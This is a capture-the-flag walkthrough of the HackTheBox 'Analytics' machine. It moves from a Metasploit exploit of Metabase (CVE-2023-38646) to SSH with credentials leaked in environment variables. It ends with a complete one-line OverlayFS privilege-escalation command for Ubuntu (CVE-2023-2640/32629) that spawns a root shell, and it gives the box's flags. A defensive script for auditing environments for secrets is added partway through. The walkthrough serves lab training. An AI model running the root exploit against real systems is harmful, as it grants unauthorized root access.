# Analytics

This is my walkthrough for the HackTheBox [Analytics Box](https://app.hackthebox.com/machines/Analytics).

<figure><img src="/files/XrusnDDa58Tu3oqnz6OM" alt=""><figcaption></figcaption></figure>

First, we scan the machine.

```bash
nmap -T4 -Pn -v 10.129.85.38
```

<figure><img src="/files/fmxbbsDmke7Ov8XsR6JG" alt=""><figcaption></figcaption></figure>

We see ports 22 and 80 open.

Browsing to the website gives an error, so we add the IP and domain to the hosts file.

<figure><img src="/files/zLPD3xUdCgP50JcRjRfF" alt=""><figcaption></figcaption></figure>

Now going back to the website we can look around!

<figure><img src="/files/XRiPgJJEiKn10DLEkMKs" alt=""><figcaption></figcaption></figure>

Looking around, we see the Login page at the top. Checking that out, it doesn't work BUT the URL has changed to `data.analytical.htb`, so let's add that to the hosts file as well.

<figure><img src="/files/ydvbISfU2lrqEedYMU1g" alt=""><figcaption></figcaption></figure>

Looking at the page, we see it's running Metabase.

<figure><img src="/files/DnHpp0j4OZh2K7yqfBux" alt=""><figcaption></figcaption></figure>

Search for Metabase exploits on Google as well as in Metasploit. I find [this blog](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) titled "Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)".

In Metasploit we see a potential exploit.

<figure><img src="/files/bbloejvVgBGhgpK4kDzR" alt=""><figcaption></figcaption></figure>

Let's check the options and set them.

<figure><img src="/files/1QdvYiGMbItIjHQlrub9" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/fe4QRcyymh0X9C1pVMq2" alt=""><figcaption></figcaption></figure>

Send the exploit....

<figure><img src="/files/1ZMAqguuIPXxeOXW4Erm" alt=""><figcaption></figcaption></figure>

We have a shell! Now let's see if we can get and run linpeas.

<figure><img src="/files/GbwlSmdrLql2XSK6WUFC" alt=""><figcaption></figcaption></figure>

We can! Run it!


<figure><img src="/files/V7BJlL8xYHCBUmdHpFzR" alt=""><figcaption></figcaption></figure>

In the "Environment" section, we see a user and a password.

<figure><img src="/files/dX4G3PM0BvvmdZqmtREa" alt=""><figcaption></figcaption></figure>

```
META_USER=metalytics
META_PASS=An4lytics_ds20223#
```
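The finding above is a login credential sitting in a process environment, readable by anything running in that context. As an added example (not part of the original walkthrough), this POSIX shell audit flags secret-looking variables in `/proc/<pid>/environ` data and prints them with the values redacted; the function names, the name patterns and the sample values are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag secret-looking variables in process environments.
# Input format matches /proc/<pid>/environ: NUL-separated NAME=VALUE records.

# audit_environ FILE: print "NAME=<redacted, N chars>" per suspicious variable.
# The name patterns are an assumption; values are never printed.
# Caveat: a value containing a newline is split and may be misreported.
audit_environ() {
    tr '\000' '\n' < "$1" | awk '
        {
            eq = index($0, "=")
            if (eq < 2) next                  # no NAME= prefix
            name  = substr($0, 1, eq - 1)
            value = substr($0, eq + 1)
            if (value == "") next             # empty value, nothing exposed
            if (toupper(name) ~ /PASS|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY/)
                printf "%s=<redacted, %d chars>\n", name, length(value)
        }'
}

# audit_all_processes: report findings for every process we are allowed to read.
audit_all_processes() {
    for env_file in /proc/[0-9]*/environ; do
        [ -r "$env_file" ] || continue
        findings=$(audit_environ "$env_file" 2>/dev/null)
        [ -n "$findings" ] || continue
        pid=${env_file#/proc/}
        pid=${pid%/environ}
        cmd=$(tr '\000' ' ' < "/proc/$pid/cmdline" 2>/dev/null)
        printf 'pid %s (%s)\n%s\n' "$pid" "$cmd" "$findings"
    done
}

# sample_findings: run the audit on a constructed environ blob (placeholder values).
sample_findings() {
    sample=$(mktemp) || return 1
    printf 'META_USER=metalytics\0META_PASS=not-a-real-secret\0PATH=/usr/bin\0SESSION_TOKEN=\0' > "$sample"
    audit_environ "$sample"
    rm -f "$sample"
}

# Default: constructed sample. Pass --all to audit the live host.
case "${1:-}" in
    --all) audit_all_processes ;;
    *)     sample_findings ;;
esac
```

Any hit is a secret to move into a secrets store or a root-only file, and to rotate if it doubles as a login password.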

Let's ssh into the machine with the newly discovered username and password.

```bash
ssh metalytics@10.129.85.38
```

<figure><img src="/files/o6sHzWW62Q1XCDYmTN67" alt=""><figcaption></figcaption></figure>

Got the user flag! `5f24e4536b318d506fe1a38fbbd959fa`

<figure><img src="/files/Me9smWG7Ke2iO0ptSANM" alt=""><figcaption></figcaption></figure>

### Priv Escalation

I saw we were running Ubuntu 22.04.3 as we logged in.

<figure><img src="/files/bYeyBMibGTYwl0riaBSd" alt=""><figcaption></figcaption></figure>

A simple Google search for "Ubuntu 22.04.3 priv escalation" shows me [this reddit post](https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/) about Ubuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629) with multiple references. They list how you can get root using the OverlayFS module with this command:

```bash
unshare -rm sh -c "mkdir 1 u w m && cp /u*/b*/p*3 1/; setcap cap_setuid+eip 1/python3;mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w, m && touch m/*;" && u/python3 -c 'import pty; import os;os.setuid(0); pty.spawn("/bin/bash")'
```

We have root! `f35c47aac97cb1a6b5450d4eb024a3cc`

<figure><img src="/files/POtb2gF7qMkU7M86WfoQ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/oraFwDF2iS423X8SY9xI" alt=""><figcaption></figcaption></figure>


